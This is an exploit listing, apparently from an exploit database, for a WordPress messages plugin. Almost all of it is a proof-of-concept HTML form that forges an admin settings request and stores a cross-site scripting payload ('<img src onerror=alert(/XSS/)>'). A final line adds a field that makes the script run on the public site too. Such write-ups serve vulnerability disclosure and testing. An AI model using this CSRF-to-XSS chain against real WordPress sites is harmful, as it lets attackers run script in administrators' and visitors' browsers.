Share
## https://sploitus.com/exploit?id=WPEX-ID:351DE889-9C0A-4637-BD06-0E1FE1D7E89F
XSS only in backend:
<html>
<body>
<form action="https://example.com/wp-admin/options-general.php?page=light_messages" method="POST">
<input type="hidden" name="action" value="update" />
<input type="hidden" name="frequency" value="0" />
<input type="hidden" name="custom_frequency" value="0" />
<input type="hidden" name="custom_frequency_type" value="0" />
<input type="hidden" name="auto_closing" value="50" />
<input type="hidden" name="content" value="Test<img src onerror=alert(/XSS/)>" />
<input type="hidden" name="bg_opacity" value="0" />
<input type="hidden" name="position_left" value="2.00" />
<input type="hidden" name="position_top" value="2.00" />
<input type="hidden" name="design" value="default|white" />
<input type="hidden" name="fontfamily" value="0" />
<input type="hidden" name="fontsize" value="15" />
<input type="hidden" name="box_size_width" value="" />
<input type="hidden" name="box_size_width_type" value="0" />
<input type="hidden" name="box_size_height" value="" />
<input type="hidden" name="box_size_height_type" value="0" />
<input type="hidden" name="submit" value="Save Changes" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
To have XSS triggered in both frontend and backend, add <input type="hidden" name="active" value="on" />